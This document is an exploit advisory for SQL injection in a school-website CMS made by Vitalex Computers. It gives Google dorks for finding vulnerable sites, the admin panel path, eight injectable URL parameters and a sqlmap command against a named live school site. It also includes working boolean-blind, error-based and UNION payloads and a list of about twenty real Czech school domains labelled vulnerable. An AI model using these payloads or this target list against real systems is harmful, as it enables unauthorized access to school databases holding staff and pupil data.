############################################################

# Exploit Title : Vitalex Computers SRO Tvorba A!kolnAch webu 1.0 SQL
Injection
# Exploit Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepages : vitalex.cz
# Google Dork 1 :  intext:'' Vitalex Computers - Tvorba A!kolnAch webu''
site:cz
# Google Dork 2 :  inurl:''/index.php?type=Blog&id=''  site:cz
# Google Dork 3 :  inurl:''/public/printAction.php?id=''
# Exploit Risk : Medium
# Category : WebApps
# Version Information : 1.0
+ TinyMCE 4.0 - FancyBox2.1.5 - jQuery1.12.2 - jQuery UI1.11.4 -
+ CodeMirror 5.20.2
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018050236

############################################################

Czech Copyright A(c) 2011 - 2018 | Vitalex Computers s.r.o. -
Tvorba A!kolnAch webu SQL Injection Vulnerability

############################################################

# Admin Panel Login Path : /administrator/

Other Possible Dorks =>

inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz

############################################################

# SQL Injection Exploit =>

/public/printCalendar.php?id=[SQL Injection]

/public/printFood.php?id=[SQL Injection]

/public/script.php?id=[SQL Injection]

/public/setTemplate.php?id=[SQL Injection]

/public/statniSvatky.php?id=[SQL Injection]

/index.php?type=Blog&id=[SQL Injection]

/index.php?type=Contact&id=[SQL Injection]

/index.php?type=Post&id=[SQL Injection]

############################################################

[+] SQLMAP Poc :
 $ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs

[+] Poc SQL Injection :
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=164 AND 1041=1041



Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR) Payload: id=164 AND (SELECT 5925 FROM
(SELECT COUNT(*),CONCAT(0x7162627171,
(SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x
    FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
 Payload: id=164 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,
 0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a466372
49687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL-- zEWq

########################################################################################

# Example Vulnerable Sites =>

# zsodolenavoda.cz/public/printAction.php?id=235%27  => [ Proof of Concept
]   => archive.is/vTVbe

Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1

# skolahotelnictvi.cz/public/printAction.php?id=235%27   => [ Proof of
Concept ]   => archive.is/gHcSO

Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1

# spss-mel.cz/public/printAction.php?id=235%27  => [ Proof of Concept ] =>
archive.is/Phhwq

Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1

zas-me.cz/public/printCalendar.php?actions=1

gspsd.cz/public/printCalendar.php?actions=1

zusbenesov.cz/public/printCalendar.php?actions=2

zsmarsovska.cz/public/printCalendar.php?actions=2

zshortan.cz/public/printCalendar.php?actions=3

zsmspetrohrad.cz/public/printCalendar.php?actions=2

zsmsklecany.cz/public/printCalendar.php?actions=2

1zszatec.cz/public/printCalendar.php?actions=1

skolazrak.cz/public/printCalendar.php?actions=3

3zslouny.cz/public/printCalendar.php?actions=2

1zsjirkov.cz/public/printCalendar.php?actions=3

skolahotelnictvi.cz/public/printCalendar.php?actions=3

zsmsujezd.cz/public/printCalendar.php?actions=3

zsarnultovice.cz/public/printCalendar.php?actions=2

zuszandov.cz/public/printCalendar.php?actions=3

zsmschuchelna.cz/public/printCalendar.php?actions=3

zsprazacka.cz/public/printCalendar.php?actions=2

#######################################################################################

# Discovered By KingSkrupellos from Cyberizm Digital Security Team

#######################################################################################